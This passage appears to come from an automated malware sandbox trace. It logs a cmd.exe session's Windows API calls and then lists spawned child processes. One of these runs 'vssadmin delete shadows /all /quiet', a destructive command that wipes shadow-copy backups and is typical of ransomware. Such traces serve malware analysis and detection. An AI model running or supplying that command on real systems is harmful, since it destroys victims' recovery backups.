(lpTopLevelExceptionFilter=0x7ff695326d00) returned 0x0 [0185.630] __getmainargs (in: _Argc=0x7ff695349200, _Argv=0x7ff695349208, _Env=0x7ff695349210, _DoWildCard=0, _StartInfo=0x7ff69534921c | out: _Argc=0x7ff695349200, _Argv=0x7ff695349208, _Env=0x7ff695349210) returned 0 [0185.630] _onexit (_Func=0x7ff695327fd0) returned 0x7ff695327fd0 [0185.630] _onexit (_Func=0x7ff695327fe0) returned 0x7ff695327fe0 [0185.630] _onexit (_Func=0x7ff695327ff0) returned 0x7ff695327ff0 [0185.631] _onexit (_Func=0x7ff695328000) returned 0x7ff695328000 [0185.631] _onexit (_Func=0x7ff695328010) returned 0x7ff695328010 [0185.631] _onexit (_Func=0x7ff695328020) returned 0x7ff695328020 [0185.632] GetCurrentThreadId () returned 0x9c8 [0185.632] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9c8) returned 0x70 [0185.632] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff8c81c0000 [0185.632] GetProcAddress (hModule=0x7ff8c81c0000, lpProcName="SetThreadUILanguage") returned 0x7ff8c81da990 [0185.632] SetThreadUILanguage (LangId=0x0) returned 0x409 [0185.721] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0185.721] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x5fc54ffc38 | out: phkResult=0x5fc54ffc38*=0x0) returned 0x2 [0185.721] VirtualQuery (in: lpAddress=0x5fc54ffc24, lpBuffer=0x5fc54ffba0, dwLength=0x30 | out: lpBuffer=0x5fc54ffba0*(BaseAddress=0x5fc54ff000, AllocationBase=0x5fc5400000, AllocationProtect=0x4, __alignment1=0xffff9f81, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0185.721] VirtualQuery (in: lpAddress=0x5fc5400000, lpBuffer=0x5fc54ffba0, dwLength=0x30 | out: lpBuffer=0x5fc54ffba0*(BaseAddress=0x5fc5400000, AllocationBase=0x5fc5400000, AllocationProtect=0x4, __alignment1=0xffff9f81, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0185.721] VirtualQuery (in: lpAddress=0x5fc5401000, lpBuffer=0x5fc54ffba0, dwLength=0x30 | out: lpBuffer=0x5fc54ffba0*(BaseAddress=0x5fc5401000, AllocationBase=0x5fc5400000, AllocationProtect=0x4, __alignment1=0xffff9f81, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0185.721] VirtualQuery (in: lpAddress=0x5fc5404000, lpBuffer=0x5fc54ffba0, dwLength=0x30 | out: lpBuffer=0x5fc54ffba0*(BaseAddress=0x5fc5404000, AllocationBase=0x5fc5400000, AllocationProtect=0x4, __alignment1=0xffff9f81, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0185.721] VirtualQuery (in: lpAddress=0x5fc5500000, lpBuffer=0x5fc54ffba0, dwLength=0x30 | out: lpBuffer=0x5fc54ffba0*(BaseAddress=0x5fc5500000, AllocationBase=0x5fc5500000, AllocationProtect=0x4, __alignment1=0xffff9f81, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0185.721] GetConsoleOutputCP () returned 0x1b5 [0185.868] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff69534fbb0 | out: lpCPInfo=0x7ff69534fbb0) returned 1 [0185.868] SetConsoleCtrlHandler (HandlerRoutine=0x7ff695338150, Add=1) returned 1 [0185.868] _get_osfhandle (_FileHandle=1) returned 0x3e0 [0185.868] GetConsoleMode (in: hConsoleHandle=0x3e0, lpMode=0x7ff69534fc04 | out: lpMode=0x7ff69534fc04) returned 0 [0185.868] _get_osfhandle (_FileHandle=0) returned 0x2ac [0185.868] GetConsoleMode (in: hConsoleHandle=0x2ac, lpMode=0x7ff69534fc00 | out: lpMode=0x7ff69534fc00) returned 0 [0185.868] _get_osfhandle (_FileHandle=1) returned 0x3e0 [0185.868] SetConsoleMode (hConsoleHandle=0x3e0, dwMode=0x0) returned 0 [0185.868] _get_osfhandle (_FileHandle=1) returned 0x3e0 [0185.868] GetConsoleMode (in: hConsoleHandle=0x3e0, lpMode=0x7ff69534fc08 | out: lpMode=0x7ff69534fc08) returned 0 [0185.868] _get_osfhandle (_FileHandle=0) returned 0x2ac [0185.868] GetConsoleMode (in: hConsoleHandle=0x2ac, lpMode=0x7ff69534fc0c | out: lpMode=0x7ff69534fc0c) returned 0 [0185.868] GetEnvironmentStringsW () returned 0x24349295a40* [0185.869] GetProcessHeap () returned 0x24349290000 [0185.869] RtlAllocateHeap (HeapHandle=0x24349290000, Flags=0x8, Size=0xab6) returned 0x24349296500 [0185.869] FreeEnvironmentStringsA (penv="=") returned 1 [0185.869] GetProcessHeap () returned 0x24349290000 [0185.869] RtlAllocateHeap (HeapHandle=0x24349290000, Flags=0x8, Size=0x8) returned 0x24349295a40 [0185.869] GetEnvironmentStringsW () returned 0x24349296fd0* [0185.869] GetProcessHeap () returned 0x24349290000 [0185.869] RtlAllocateHeap (HeapHandle=0x24349290000, Flags=0x8, Size=0xab6) returned 0x24349297a90 [0185.869] FreeEnvironmentStringsA (penv="=") returned 1 [0185.869] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x5fc54feae8 | out: phkResult=0x5fc54feae8*=0x7c) returned 0x0 [0185.869] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x5fc54feae0, lpData=0x5fc54feb00, lpcbData=0x5fc54feae4*=0x1000 | out: lpType=0x5fc54feae0*=0x0, lpData=0x5fc54feb00*=0x4, lpcbData=0x5fc54feae4*=0x1000) returned 0x2 [0185.869] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x5fc54feae0, lpData=0x5fc54feb00, lpcbData=0x5fc54feae4*=0x1000 | out: lpType=0x5fc54feae0*=0x4, lpData=0x5fc54feb00*=0x1, lpcbData=0x5fc54feae4*=0x4) returned 0x0 [0185.869] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x5fc54feae0, lpData=0x5fc54feb00, lpcbData=0x5fc54feae4*=0x1000 | out: lpType=0x5fc54feae0*=0x0, lpData=0x5fc54feb00*=0x1, lpcbData=0x5fc54feae4*=0x1000) returned 0x2 [0185.869] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x5fc54feae0, lpData=0x5fc54feb00, lpcbData=0x5fc54feae4*=0x1000 | out: lpType=0x5fc54feae0*=0x4, lpData=0x5fc54feb00*=0x0, lpcbData=0x5fc54feae4*=0x4) returned 0x0 [0185.869] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x5fc54feae0, lpData=0x5fc54feb00, lpcbData=0x5fc54feae4*=0x1000 | out: lpType=0x5fc54feae0*=0x4, lpData=0x5fc54feb00*=0x40, lpcbData=0x5fc54feae4*=0x4) returned 0x0 [0185.869] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x5fc54feae0, lpData=0x5fc54feb00, lpcbData=0x5fc54feae4*=0x1000 | out: lpType=0x5fc54feae0*=0x4, lpData=0x5fc54feb00*=0x40, lpcbData=0x5fc54feae4*=0x4) returned 0x0 [0185.869] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x5fc54feae0, lpData=0x5fc54feb00, lpcbData=0x5fc54feae4*=0x1000 | out: lpType=0x5fc54feae0*=0x0, lpData=0x5fc54feb00*=0x40, lpcbData=0x5fc54feae4*=0x1000) returned 0x2 [0185.870] RegCloseKey (hKey=0x7c) returned 0x0 [0185.870] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x5fc54feae8 | out: phkResult=0x5fc54feae8*=0x7c) returned 0x0 [0185.870] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x5fc54feae0, lpData=0x5fc54feb00, lpcbData=0x5fc54feae4*=0x1000 | out: lpType=0x5fc54feae0*=0x0, lpData=0x5fc54feb00*=0x40, lpcbData=0x5fc54feae4*=0x1000) returned 0x2 [0185.870] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x5fc54feae0, lpData=0x5fc54feb00, lpcbData=0x5fc54feae4*=0x1000 | out: lpType=0x5fc54feae0*=0x4, lpData=0x5fc54feb00*=0x1, lpcbData=0x5fc54feae4*=0x4) returned 0x0 [0185.870] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x5fc54feae0, lpData=0x5fc54feb00, lpcbData=0x5fc54feae4*=0x1000 | out: lpType=0x5fc54feae0*=0x0, lpData=0x5fc54feb00*=0x1, lpcbData=0x5fc54feae4*=0x1000) returned 0x2 [0185.870] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x5fc54feae0, lpData=0x5fc54feb00, lpcbData=0x5fc54feae4*=0x1000 | out: lpType=0x5fc54feae0*=0x4, lpData=0x5fc54feb00*=0x0, lpcbData=0x5fc54feae4*=0x4) returned 0x0 [0185.870] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x5fc54feae0, lpData=0x5fc54feb00, lpcbData=0x5fc54feae4*=0x1000 | out: lpType=0x5fc54feae0*=0x4, lpData=0x5fc54feb00*=0x9, lpcbData=0x5fc54feae4*=0x4) returned 0x0 [0185.870] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x5fc54feae0, lpData=0x5fc54feb00, lpcbData=0x5fc54feae4*=0x1000 | out: lpType=0x5fc54feae0*=0x4, lpData=0x5fc54feb00*=0x9, lpcbData=0x5fc54feae4*=0x4) returned 0x0 [0185.870] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x5fc54feae0, lpData=0x5fc54feb00, lpcbData=0x5fc54feae4*=0x1000 | out: lpType=0x5fc54feae0*=0x0, lpData=0x5fc54feb00*=0x9, lpcbData=0x5fc54feae4*=0x1000) returned 0x2 [0185.870] RegCloseKey (hKey=0x7c) returned 0x0 [0185.870] time (in: timer=0x0 | out: timer=0x0) returned 0x5ccf6ba7 [0185.870] srand (_Seed=0x5ccf6ba7) [0185.870] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0185.870] malloc (_Size=0x4000) returned 0x243495f5530 [0185.870] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0185.870] malloc (_Size=0xffce) returned 0x24349460080 [0185.871] ??_V@YAXPEAX@Z () returned 0x24349460080 [0185.871] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x24349460080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0185.871] malloc (_Size=0xffce) returned 0x24349470060 [0185.872] ??_V@YAXPEAX@Z () returned 0x24349470060 [0185.872] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24349470060, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0185.872] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps;") returned 0xbc [0185.872] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.872] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0185.873] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0185.873] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0185.873] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0185.873] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0185.873] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0185.873] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0185.873] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0185.873] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0185.873] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0185.873] GetProcessHeap () returned 0x24349290000 [0185.873] RtlFreeHeap (HeapHandle=0x24349290000, Flags=0x0, BaseAddress=0x24349296500) returned 1 [0185.873] GetEnvironmentStringsW () returned 0x24349295a60* [0185.873] GetProcessHeap () returned 0x24349290000 [0185.873] RtlAllocateHeap (HeapHandle=0x24349290000, Flags=0x8, Size=0xace) returned 0x24349296540 [0185.873] FreeEnvironmentStringsA (penv="=") returned 1 [0185.873] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0185.873] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0185.873] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0185.873] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0185.873] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0185.874] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0185.874] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0185.874] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0185.874] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0185.874] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0185.874] malloc (_Size=0xffce) returned 0x24349480040 [0185.874] ??_V@YAXPEAX@Z () returned 0x24349480040 [0185.874] GetProcessHeap () returned 0x24349290000 [0185.874] RtlAllocateHeap (HeapHandle=0x24349290000, Flags=0x8, Size=0x38) returned 0x24349298580 [0185.874] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x24349480040 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0185.875] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x7fe7, lpBuffer=0x24349480040, lpFilePart=0x5fc54ff660 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x5fc54ff660*="system32") returned 0x13 [0185.875] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0185.875] FindFirstFileW (in: lpFileName="C:\\WINDOWS", lpFindFileData=0x5fc54ff390 | out: lpFindFileData=0x5fc54ff390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x243492985c0 [0185.875] FindClose (in: hFindFile=0x243492985c0 | out: hFindFile=0x243492985c0) returned 1 [0185.875] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x5fc54ff390 | out: lpFindFileData=0x5fc54ff390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xfabde9f3, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfabde9f3, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x243492985c0 [0185.875] FindClose (in: hFindFile=0x243492985c0 | out: hFindFile=0x243492985c0) returned 1 [0185.876] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0185.876] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0185.876] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0185.876] GetProcessHeap () returned 0x24349290000 [0185.876] RtlFreeHeap (HeapHandle=0x24349290000, Flags=0x0, BaseAddress=0x24349296540) returned 1 [0185.876] GetEnvironmentStringsW () returned 0x24349295a60* [0185.876] GetProcessHeap () returned 0x24349290000 [0185.876] RtlAllocateHeap (HeapHandle=0x24349290000, Flags=0x8, Size=0xafe) returned 0x24349296570 [0185.876] FreeEnvironmentStringsA (penv="=") returned 1 [0185.876] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x24349460080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0185.876] GetProcessHeap () returned 0x24349290000 [0185.876] RtlFreeHeap (HeapHandle=0x24349290000, Flags=0x0, BaseAddress=0x24349298580) returned 1 [0185.876] ??_V@YAXPEAX@Z () returned 0x1 [0185.876] ??_V@YAXPEAX@Z () returned 0x1 [0185.876] GetProcessHeap () returned 0x24349290000 [0185.876] RtlAllocateHeap (HeapHandle=0x24349290000, Flags=0x8, Size=0x4016) returned 0x24349298580 [0185.876] GetProcessHeap () returned 0x24349290000 [0185.876] RtlFreeHeap (HeapHandle=0x24349290000, Flags=0x0, BaseAddress=0x24349298580) returned 1 [0185.876] GetConsoleOutputCP () returned 0x1b5 [0185.977] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff69534fbb0 | out: lpCPInfo=0x7ff69534fbb0) returned 1 [0185.977] GetUserDefaultLCID () returned 0x409 [0185.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff69534bb78, cchData=8 | out: lpLCData=":") returned 2 [0185.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x5fc54ffa20, cchData=128 | out: lpLCData="0") returned 2 [0185.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x5fc54ffa20, cchData=128 | out: lpLCData="0") returned 2 [0185.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x5fc54ffa20, cchData=128 | out: lpLCData="1") returned 2 [0185.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff69534bb68, cchData=8 | out: lpLCData="/") returned 2 [0185.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff69534bb00, cchData=32 | out: lpLCData="Mon") returned 4 [0185.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff69534bac0, cchData=32 | out: lpLCData="Tue") returned 4 [0185.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff69534ba80, cchData=32 | out: lpLCData="Wed") returned 4 [0185.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff69534ba40, cchData=32 | out: lpLCData="Thu") returned 4 [0185.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff69534ba00, cchData=32 | out: lpLCData="Fri") returned 4 [0185.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff69534b9c0, cchData=32 | out: lpLCData="Sat") returned 4 [0185.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff69534b980, cchData=32 | out: lpLCData="Sun") returned 4 [0185.978] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff69534bb58, cchData=8 | out: lpLCData=".") returned 2 [0185.978] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff69534bb40, cchData=8 | out: lpLCData=",") returned 2 [0185.978] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0185.979] GetProcessHeap () returned 0x24349290000 [0185.979] RtlAllocateHeap (HeapHandle=0x24349290000, Flags=0x0, Size=0x20c) returned 0x243492970f0 [0185.979] GetConsoleTitleW (in: lpConsoleTitle=0x243492970f0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0186.078] _get_osfhandle (_FileHandle=1) returned 0x3e0 [0186.078] GetFileType (hFile=0x3e0) returned 0x3 [0186.079] ApiSetQueryApiSetPresence () returned 0x0 [0186.079] ResolveDelayLoadedAPI () returned 0x7ff8bf27d990 [0186.082] BrandingFormatString () returned 0x243492962f0 [0186.090] GetVersion () returned 0x3ad7000a [0186.090] _vsnwprintf (in: _Buffer=0x5fc54ffb80, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x5fc54ffb18 | out: _Buffer="10.0.15063") returned 10 [0186.090] _get_osfhandle (_FileHandle=1) returned 0x3e0 [0186.090] GetFileType (hFile=0x3e0) returned 0x3 [0186.090] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff695357f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0186.090] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff695357f60, nSize=0x2000, Arguments=0x5fc54ffb20 | out: lpBuffer="Microsoft Windows [Version 10.0.15063]") returned 0x26 [0186.090] _get_osfhandle (_FileHandle=1) returned 0x3e0 [0186.090] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 10.0.15063]", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 10.0.15063]", lpUsedDefaultChar=0x0) returned 39 [0186.091] WriteFile (in: hFile=0x3e0, lpBuffer=0x7ff695349970, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x5fc54ffa78, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x5fc54ffa78, lpOverlapped=0x0) returned 0 [0186.091] GetLastError () returned 0xe8 [0186.091] _vsnwprintf (in: _Buffer=0x7ff695357f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x5fc54ffb48 | out: _Buffer="\r\n") returned 2 [0186.091] _get_osfhandle (_FileHandle=1) returned 0x3e0 [0186.091] GetFileType (hFile=0x3e0) returned 0x3 [0186.091] _get_osfhandle (_FileHandle=1) returned 0x3e0 [0186.091] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0186.091] WriteFile (in: hFile=0x3e0, lpBuffer=0x7ff695349970, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x5fc54ffb18, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x5fc54ffb18, lpOverlapped=0x0) returned 0 [0186.091] GetLastError () returned 0xe8 [0186.091] _get_osfhandle (_FileHandle=1) returned 0x3e0 [0186.091] GetFileType (hFile=0x3e0) returned 0x3 [0186.091] _get_osfhandle (_FileHandle=1) returned 0x3e0 [0186.091] GetFileType (hFile=0x3e0) returned 0x3 [0186.091] _get_osfhandle (_FileHandle=2) returned 0x3e0 [0186.091] GetFileType (hFile=0x3e0) returned 0x3 [0186.091] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2364, dwLanguageId=0x0, lpBuffer=0x7ff695357f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The process tried to write to a nonexistent pipe.\r\n") returned 0x33 [0186.091] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2364, dwLanguageId=0x0, lpBuffer=0x7ff695357f60, nSize=0x2000, Arguments=0x5fc54ffab0 | out: lpBuffer="The process tried to write to a nonexistent pipe.\r\n") returned 0x33 [0186.091] _get_osfhandle (_FileHandle=2) returned 0x3e0 [0186.091] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The process tried to write to a nonexistent pipe.\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The process tried to write to a nonexistent pipe.\r\n", lpUsedDefaultChar=0x0) returned 52 [0186.091] WriteFile (in: hFile=0x3e0, lpBuffer=0x7ff695349970, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x5fc54ffa08, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x5fc54ffa08, lpOverlapped=0x0) returned 0 [0186.091] GetLastError () returned 0xe8 [0186.091] exit (_Code=1) Thread: id = 110 os_tid = 0x4f8 Process: id = "16" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x89a2000" os_pid = "0x9d0" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0xbb0" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 102 os_tid = 0x38c Thread: id = 104 os_tid = 0x4e4 Thread: id = 107 os_tid = 0x4c0 Thread: id = 108 os_tid = 0x4c4 Thread: id = 109 os_tid = 0x4ac Process: id = "17" image_name = "mode.com" filename = "c:\\windows\\system32\\mode.com" page_root = "0x9b80000" os_pid = "0x500" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0xc40" cmd_line = "mode con cp select=1251" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 111 os_tid = 0x4a4 Thread: id = 112 os_tid = 0xcf8 Process: id = "18" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x95b7000" os_pid = "0x4a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0xc40" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 113 os_tid = 0x36c Thread: id = 114 os_tid = 0x3a4 Thread: id = 115 os_tid = 0x478 Thread: id = 116 os_tid = 0x47c Thread: id = 117 os_tid = 0x4c8